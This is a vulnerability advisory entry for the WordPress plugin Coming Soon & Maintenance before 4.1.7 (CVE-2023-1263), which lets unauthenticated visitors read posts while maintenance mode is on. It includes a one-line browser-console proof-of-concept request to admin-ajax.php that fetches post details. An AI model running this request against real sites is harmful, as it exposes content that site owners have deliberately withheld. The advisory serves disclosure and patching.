Lucene search
WpvulndbWPVDB-ID:2E07FFD9-8E82-4078-96AA-162EF78C417BHistoryMar 07, 2023 - 12:00 a.m.
Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access in Maintenance Mode
2023-03-0700:00:00
wpscan.com
10
unauthenticated access
published posts
maintenance mode
web browser
plugin vulnerability
0.003 Low
EPSS
Percentile
65.6%
The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them
PoC
Run the below command in the developer console of the web browser while being on the blog as unauthenticated, when maintenance mode is enabled fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=cmp_get_post_detail&id;=42’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));
| CPE | Name | Operator | Version |
|---|---|---|---|
| cmp-coming-soon-maintenance | lt | 4.1.7 |
Related
wpexploit
wpexploit
prion
prion
Information disclosure
2023-03-07 22:15:00
nvd
nvd
CVE-2023-1263
2023-03-07 22:15:10
cvelist
cvelist
CVE-2023-1263
2023-03-07 21:07:47
cve
cve
CVE-2023-1263
2023-03-07 22:15:10
openvas
openvas
nuclei
nuclei
Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
2023-10-17 07:20:28
wordfence
wordfence